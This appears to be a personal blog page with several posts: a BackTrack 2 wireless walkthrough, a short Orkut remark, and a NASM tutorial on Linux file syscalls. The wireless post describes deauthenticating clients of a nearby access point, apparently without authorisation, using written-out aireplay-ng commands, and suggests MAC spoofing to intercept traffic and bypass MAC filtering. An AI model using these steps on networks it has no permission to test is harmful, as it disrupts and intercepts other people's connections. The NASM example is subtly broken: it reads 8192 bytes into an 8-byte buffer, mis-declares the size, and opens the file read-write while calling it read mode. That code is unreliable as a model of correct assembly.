Truth, Computing and Fail

Yeah, I know BT3 Beta is doing the rounds but when learning something, I don’t exactly like to walk on the bleeding edge!

The collection of tools is amazing and I don’t even need to go on blabbering about it. Its the distro of choice for security professionals. The multitude of scripts are simply vast each grouped neatly in the appropriate categories for radio analyzing, os fingerprinting, forensics etc etc (heck, I don’t even remember all of them).

I booted into BT2 using the live CD. I prefer the live CD in this case as I don’t exactly wanna mess around with my wireless settings by creating and destroying multiple VAPs. Got down straight to work, fired up airodump-ng. Found a couple of clients connected to the AP near me. Deauth-ed them with aireplay-ng. To make sure it was working, called over a friend to my room, tested the deauth on his laptop and it was working!

Ok, catch up with your breath. This is how I did it:

Created a VAP ath1 in monitor mode
wlanconfig ath1 create wlandev wifi0 wlanmode monitor
I wont even explain how to start up airodump-ng. Its as easy as 1-2-3.

Deauth the clients using the MAC addresses found with aireplay-ng.
aireplay-ng -0 30 -c client MAC address -a access point MAC address ath1
Here -0 means deauth and 30 is the number of deauth requests to be sent.

At this stage, you can easily spoof the MAC address and capture the packets intended to be received by the now disconnected client. Maybe get around MAC based authentication too if that is the first layer of security in a network.
Finally, don’t forget to check out the documentation and tutorials at aircrack-ng.org

Looks like Orkut has followed suit in the steps of Facebook. Just logged in and I can see a ton of them. Currently trying out Music iLike. Time to show my allegiance to the ’80s!

This is meant for NASM running on a linux machine. First things first: everything in UNIX is a file. A device is a file, a network socket is a file and everything else you can imagine is a file. Each file has a file descriptor attached to it. Some standard file descriptors are 0 for STDIN (standard input), 1 for STDOUT (standard output) and 2 for STDERR (standard error output). Since everything is a file, you can read() and write() on them provided you have the file descriptor.

read(), write() and open() are some of the very important syscalls in linux that would allow you to manipulate any file (that is, provided you have the permissions). There are some 150+ of them if you are really interested to find out. For syscalls, you need to pass the necessary parameters in the ebx, ecx, edx registers and so on, depending upon the number of parameters. You can also call libc functions by declaring them as extern printf for example and pushing the necessary parameters on the stack, the last parameter to be pushed first. To understand what kind of parameters need to be passed for the syscalls, read the developer man pages. Like man 2 write for write(). Use this for any other syscall like read() or open() and also keep the list of syscalls mentioned earlier in this post handy.

Regarding passing arguments to the program, they are stored in the stack as

argc
argv[0]
argv[1]
argv[2]

and so on…
argv[0] is the program name itself, so we can pop and discard it safely.

The following is a small program in NASM that takes a filename as an argument and reads 8kB from the file and displays it on the screen.

section .data
buf times 8 db 0
bufsize db 8192

section .text
global _start

_start:
pop ebx
pop ebx
pop ebx
mov eax,5
mov ecx,2	;the read mode
int 80h

test eax,eax
jns file_read

mov ebx,eax
mov eax,1
int 80h
ret

file_read:
mov ebx,eax	;move the file descriptor
mov eax,3	;3 for read()
mov ecx,buf	;the buffer
mov edx,bufsize	;the buffer size
int 80h

mov edx,eax	;move the number of bytes read from the previous syscall to edx
mov eax,4	;4 for write()
mov ebx,1	;1, the STDOUT file descriptor
int 80h

mov eax,1
mov ebx,0
int 80h		;exit with error code 0
ret

To assemble: nasm -f elf filename.asm
To link: ld -s -o executable-name filename.o

To know more about the read and write modes, the file descriptors and some increased masochistic behavior, start with reading the /usr/include/unistd.h and /usr/include/fcntl.h files. Poke around that directory for some more knowledge.